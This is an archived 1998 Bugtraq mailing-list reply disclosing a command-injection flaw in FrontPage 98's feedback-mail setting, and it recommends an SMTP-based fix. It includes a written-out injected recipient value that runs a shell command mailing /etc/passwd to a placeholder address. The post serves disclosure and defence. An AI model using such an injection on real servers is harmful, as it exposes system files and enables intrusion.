Re: Followup to FP98 and other Frontpage bugs

maex-lists-bugtraqSPACE.NET

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Olaf Kirch: "The poisoned NUL byte"
• Previous message: Jeff Horwitz: "Re: Annoying Solaris/CDE/NIS+ bug"
• In reply to: pedwardWEBCOM.COM: "Followup to FP98 and other Frontpage bugs"

On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedwardWEBCOM.COM wrote:
> So, here is the status of Frontpage and it's (in)security.

Don't know whether this has already been reported.
I've noticed another weakness which is still present at least in
FP98 with the version id:
    FPVersion="3.0.2.1330"

When installing a server for Frontpage it creates a file (usually)
   /usr/local/frontpage/www.example.com:80.cnf

In order to get the feedback bot working for sending feedback via eMail
you can define within this file
    SendmailCommand:/usr/sbin/sendmail %r
The "%r" above is substituted with the recipients email address(es).

With this setting you are vulnerable, as creating a feedback page
with a recipient address of e.g.
        `/usr/bin/Mail -s 'password' nobodyexample.com < /etc/passwd`
will execute the command
    /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobodyexample.com < /etc/passwd`
and send the password file to nobodyexample.com.

To avoid this tell Frontpage to use the SMTP protocol to send emails
by using
    SMTPHost:mail.example.com
and you may probably also use
    MailSender:webmasterexample.com


        \Maex

--
SpaceNet GmbH          |   http://www.Space.Net/   | In a world whithout
Research & Development | mailto:researchSpace.Net |   walls and fences,
Frankfurter Ring 193a  |  Tel: +49 (89) 32356-0    | who needs
D-80807 Muenchen       |  Fax: +49 (89) 32356-299  |   Windows and Gates?

• Next message: Olaf Kirch: "The poisoned NUL byte"
• Previous message: Jeff Horwitz: "Re: Annoying Solaris/CDE/NIS+ bug"
• In reply to: pedwardWEBCOM.COM: "Followup to FP98 and other Frontpage bugs"